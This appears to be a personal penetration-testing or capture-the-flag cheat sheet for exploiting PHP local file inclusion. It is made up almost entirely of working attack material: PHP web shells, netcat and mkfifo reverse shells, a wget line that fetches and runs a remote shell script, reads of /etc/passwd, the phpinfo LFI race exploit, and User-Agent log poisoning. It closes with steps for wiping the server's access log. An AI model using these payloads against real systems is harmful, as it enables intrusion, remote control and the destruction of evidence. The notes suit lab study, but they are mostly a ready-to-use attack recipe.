php

<?php system($_GET["cmd"]); ?>               ..should work
<?php echo system($_REQUEST ["cmd"]); ?>     ..one I normally see

http://web/hi.php?notes=/../note.php&cmd=nc -e /bin/sh 10.x.x.x 4444
http://web/hi.php?notes=/../note.php&cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.x.x.x 4444 > /tmp/f

<?php system("wget $IP/shell.php -O /tmp/shell.php; php /tmp/shell.php"); ?>

https://$IP/phpinfo.php                 ..Found: file_uploads 'On'
https://$IP/browse.php                  ..page can run local php scripts
https://$IP/browse.php?file=Hello       ..fail
https://$IP/browse.php?file=index.php   ..ok

Encode to view Source:
https://$IP/browse.php?file=php://filter/convert.base64-encode/resource=index.php   ..encodes b64
echo PD9waHAKcHJ.. | base64 -d  ..<?php print_r(ini_get_all());?>

https://$IP/browse.php?file=http://$MyIP/Anyfile   ..http wrapper disabled
https://$IP/browse.php?file=ftp://$MyIP/Anyfile    ..ftp wrapper disabled
https://$IP/browse.php?file=expect://ls            ..unable to find wrapper
https://$IP/browse.php?file=/etc/passwd            ..ok (found username)

POST /phpinfo.php HTTP/1.1   
Content-Type: multipart/form-data; boundary=--HelloWorld

----HelloWorld
Content-Disposition: form-data; name="blah"; filename="TestFile"
Content-Type: text/plain
Does this work
----HelloWorld

View phpinfo results to see if our file was accepted:
"PHP Variables"            ..header
_FILES("blah")             ..found!

---------------------
---------------------
Replace the PAYLOAD with a full reverse-payload
PAYLOAD="""$s\r<?php...;?> \r""" % TAG
(keep all the weird bits.. just focus on swapping the php line
<?php...;?>

---------------------
---------------------
locate php-reverse
php-reverse-shell.php
paste into phpinfolfi.py as 'payload'
<?php...?>
update ip, port
del comments
LFIREQ="""GET... /browse.php?file=%s HTTP/1.1\r
i = d.find("[tmp_name] =>")    ..problem
i = d.find("[tmp_name] =&gt")  ..fixed twice in script

---------------------
---------------------
python phpinfolfi.py $IP 80 100
.. port 80
.. threads 100

nc -nvlp 9001  ..got a shell

TEST 1

View Log:
https://$IP/browse.php > /var/log/httpd-access.log
curl https://$IP/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log

Burp > Repeater > Custom "User-Agent"
https://$IP/doesntmatter
User-Agent: Hello World

Confirm:
Notice "Hello World" was sent as the User-Agent
We have control over this field, and we can send malicious payload here

TEST 2

Burp > Repeater > Custom "User-Agent"
https://$IP/doesntmatter
User-Agent: <?php echo('Hello World'); ?>

https://$IP/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log
We see "Hello World" in the log
php-tags were read (ie: dont see them written in plain-text)
Meaning we have execution!

EXPLOIT

Burp > Repeater > Custom "User-Agent"
GET /doesntmatter HTTP/1.1
User-Agent: <?php system($_REQUEST['cmd']) ?>

https://$IP/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log
https://$IP/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log&cmd=hostname
https://$IP/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log&cmd=ls -la
https://$IP/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log&cmd=uname -a
https://$IP/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log&cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i|nc 10.x.x.x 4444 >/tmp/f
(might need burp url-encode)

nc -nvlp 4444  ..connected!

bsd reverse netcat
bsd doesnt like the 'normal' reverse

normal:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.x.x.x 9002 >/tmp/f

bsd version:
mkfifo /tmp/f;cat /tmp/f|/bin/sh -i |nc 10.x.x.x 4444 >/tmp/f            ..ippsec
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i|nc 10.x.x.x 4444 >/tmp/f   ..maybe

Log issue:

vi /var/log/httpd-access.log
delete our bad-line from earlier mistake, oops
because we used echo "Hello World" with double-quotes

Wipe the log file:
echo "" > httpd-access.log